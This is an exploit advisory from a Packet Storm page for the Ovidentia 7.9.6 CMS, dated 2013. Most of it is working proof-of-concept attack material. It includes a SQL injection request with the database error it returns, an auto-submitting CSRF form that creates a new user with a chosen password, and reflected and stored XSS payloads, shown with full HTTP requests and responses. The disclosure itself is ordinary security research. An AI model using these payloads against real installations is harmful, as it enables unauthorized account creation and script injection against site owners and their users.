accept no compromises

Ovidentia 7.9.6 CSRF / XSS / SQL Injection

Ovidentia 7.9.6 CSRF / XSS / SQL Injection
Posted Dec 9, 2013
Authored by sajith

Ovidentia version 7.9.6 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
MD5 | 6ae96694e5e6479118503c6230dc9f77

Ovidentia 7.9.6 CSRF / XSS / SQL Injection

Change Mirror Download
###########################################################
[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities
[~] Author: sajith
[~] version: Ovidentia 7.9.6
[~]Vendor Homepage: http://www.ovidentia.org/
[~] vulnerable app link:http://www.ovidentia.org/telecharger
###########################################################

[1]SQL injection vulnerability


Log into admin panel and access delegate functionality > managing
administrators where &id parameter (shown below link) is vulnerable to sql
injection

http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1

POC by sajith shetty:

request:

GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=

response:

style="cursor: pointer"
onclick="s=document.getElementById('babParam_1_5_0');
s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div
style="display: none; background-color: #EEEECC"
id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)
<i>called at</i>
[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute
query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>
<p><b>Database Error: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ''' at line 1</b></p>
<p>This script cannot continue, terminating.



[2]CSRF vulnerability

log into the admin portal and access the create user functionality
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=
using csrf vulnerability it was possible to add new user.

<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php"
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="user[sendpwd]" value="0" />
<input type="hidden" name="user[password1]" value="P@ssw0rd1" />
<input type="hidden" name="user[notifyuser]" value="0" />
<input type="hidden" name="grp" value="" />
<input type="hidden" name="idx" value="Create" />
<input type="hidden" name="user[password2]" value="P@ssw0rd1" />
<input type="hidden" name="user[givenname]" value="POC" />
<input type="hidden" name="pos" value="A" />
<input type="hidden" name="widget_filepicker_job_uid[]"
value="52a35b7fac6c9" />
<input type="hidden" name="user[email]" value="poctester@xyz.com" />
<input type="hidden" name="user[nickname]" value="1234" />
<input type="hidden" name="user[sn]" value="test" />
<input type="hidden" name="tg" value="users" />
<input type="hidden" name="user[mn]" value="tester" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>




[3]Reflected XSS

http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x
onerror=prompt(1);>

request:

GET
/cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95


response:

<div id="ovidentia_headbottomright">
<div>
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :
http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x
onerror=prompt(1);>" title="Home"><img
src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"
/></a>
<!-- Script OVML: show the list of the buttons of quick accesses to
functions by leaning on entries available in user section -->



[4]Stored xss

log into the admin portal and access mail functionlity and create new
domain using link below


http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y

here Name & Description field is vulnerable to stored XSS .payload:"><img
src=x onerror=prompt(1);>



request:


POST /cms/ovidentia-7-9-6/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen


response:
<td>Registrierte User</td>
</tr>
<tr class="BabSiteAdminFontBackground">
<td>
<a href="
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img
src=x onerror=prompt(111);></a>
</td>
<td>"><img src=x onerror=prompt(222);></td>
<td>Registrierte User</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</div>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close